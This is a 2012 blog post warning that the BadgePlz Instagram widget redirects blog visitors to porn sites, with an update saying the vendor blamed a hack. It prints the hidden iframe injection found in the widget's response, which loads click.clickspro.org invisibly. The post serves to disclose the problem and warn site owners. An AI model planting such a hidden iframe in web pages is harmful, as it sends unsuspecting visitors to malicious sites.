BadgePlz is Malware (maybe)

We installed a widget that displays our instagram photos on our blog sidebar at blog.mimoco.com . Its a nice widget called “BadgePlz”.

But sadly this widget is definitely malware. It will periodically redirect your users to porn sites. It appears to only redirect you once, so you may have a hard time seeing it more than once. You can confirm this by viewing your site using Google Chrome in “incognito” mode.

Here is the BadgePlz embed code that we use:

<iframe id="badgefr" src="http://badgeplz.com/instagram/?u=m
imobot&t=c&bgclr=ffffff&brclr=cccccc&px=3&py=3&pb=2&brds=2&i
ncls=y&svc=instagram&pbclr=ffffff&sze=75" allowTransparency=
"true" frameborder="0" scrolling="no" style="border:none; ov
erflow:hidden; width:275px; height: 380px">

If you fetch the badgeplz url directly it will return the following:

<iframe width="10" height="10"
style="visibility:hidden;position:absolute;left:0;top:0;"
src="http://click.clickspro.org/feed/frames.php?uid=56&frames=3">
</iframe>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
... the real widget is in here...
</head>
</html>
</code>

That top iframe, is the porn site injection attack. I emailed BadgePlz about it – but I sincerely doubt they don’t know their widget is serving this malware injection attack.

This is the risk you take when you allow cross site scripting widgets.

My recommendation is that people remove badgeplz immediately.

Update:

BadgePlz claims they were “hacked” – see comment below. I loaded their badge URL today (October 9th, 2012) and the clickspro spam attack is gone now. There is no way for me to know if their spam element was deliberate and may return – or if they were really hacked. As of today the widget seems safe again.